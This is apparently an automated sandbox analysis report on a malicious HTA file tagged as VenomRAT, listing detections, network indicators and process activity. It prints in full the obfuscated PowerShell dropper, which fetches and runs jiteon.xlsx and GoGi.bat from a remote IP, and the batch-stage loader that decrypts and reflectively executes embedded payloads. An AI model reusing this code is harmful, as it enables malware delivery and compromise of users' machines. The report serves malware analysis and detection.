Windows Analysis Report
hta.hta

Overview

General Information

Sample name:	hta.hta
Analysis ID:	1429074
MD5:	dbc5a204c56d2c6c974bb9ce287978d4
SHA1:	dca280ec6fcc06611132200b78bf9e7bd66504ef
SHA256:	d8a8f1d0c357bdecb7bb471e1809231088ed6d4489355da038807aa1a73e964e
Tags:	htavenomrat
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Powerup Write Hijack DLL

Sigma detected: Suspicious MSHTA Child Process

Suspicious powershell command line found

Uses known network protocols on non-standard ports

Very long command line found

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Excel Network Connections

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Potential Dosfuscation Activity

Sigma detected: Suspicious Office Outbound Connections

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: hta.hta

Avira: detected

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://193.222.96.114	Virustotal: Detection: 10%	Perma Link
Source: http://193.222.96.114:7287/jiteon.xlsx	Virustotal: Detection: 15%	Perma Link
Source: http://193.222.96.114:7287/GoGi.bat	Virustotal: Detection: 11%	Perma Link
Source: http://193.222.96.11	Virustotal: Detection: 6%	Perma Link

Multi AV Scanner detection for submitted file

Source: hta.hta	Virustotal: Detection: 39%			Perma Link
Source: hta.hta	ReversingLabs: Detection: 39%

Source: unknown	HTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.4:49755 version: TLS 1.2

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 7287
Source: unknown	Network traffic detected: HTTP traffic on port 7287 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 7287
Source: unknown	Network traffic detected: HTTP traffic on port 7287 -> 49731

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 193.222.96.114:7287

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /jiteon.xlsx HTTP/1.1Host: 193.222.96.114:7287Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /GoGi.bat HTTP/1.1Host: 193.222.96.114:7287

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 13.107.246.41 13.107.246.41
Source: Joe Sandbox View	IP Address: 13.107.246.41 13.107.246.41

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknown	TCP traffic detected without corresponding DNS query: 193.222.96.114

Source: global traffic	HTTP traffic detected: GET /rules/rule170012v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule63067v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /jiteon.xlsx HTTP/1.1Host: 193.222.96.114:7287Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /GoGi.bat HTTP/1.1Host: 193.222.96.114:7287

Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.2
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.22
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.9
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.1
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.11
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760006008.0000000005567000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:72
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:728
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760006008.0000000005567000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/G
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/Go
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/GoG
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/GoGi
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/GoGi.
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/GoGi.b
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/GoGi.ba
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/GoGi.bat
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.222.96.114:7287/jiteon.xlsx
Source: svchost.exe, 0000000B.00000002.2966470735.000002AB2DCC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.3.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB33228000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB33228000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB33228000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB3325D000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.11.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1760006008.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1786540892.0000000004CC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.1786540892.0000000004C87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6LR
Source: powershell.exe, 00000001.00000002.1760006008.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1786540892.0000000004CA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB332D2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB332D2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB332D2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.11.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: unknown	HTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.4:49755 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2066
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2190
Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2066	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2190	Jump to behavior

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Searches for the Microsoft Outlook file path

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Yara signature match

Source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.winHTA@22/17@0/3

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\jiteon.xlsx

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whkbyoyv.adm.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" "

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: hta.hta	Virustotal: Detection: 39%
Source: hta.hta	ReversingLabs: Detection: 39%

Source: powershell.exe

String found in binary or memory: prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml$global:?

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\hta.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Roaming\jiteon.xlsx"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\GoGi.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG 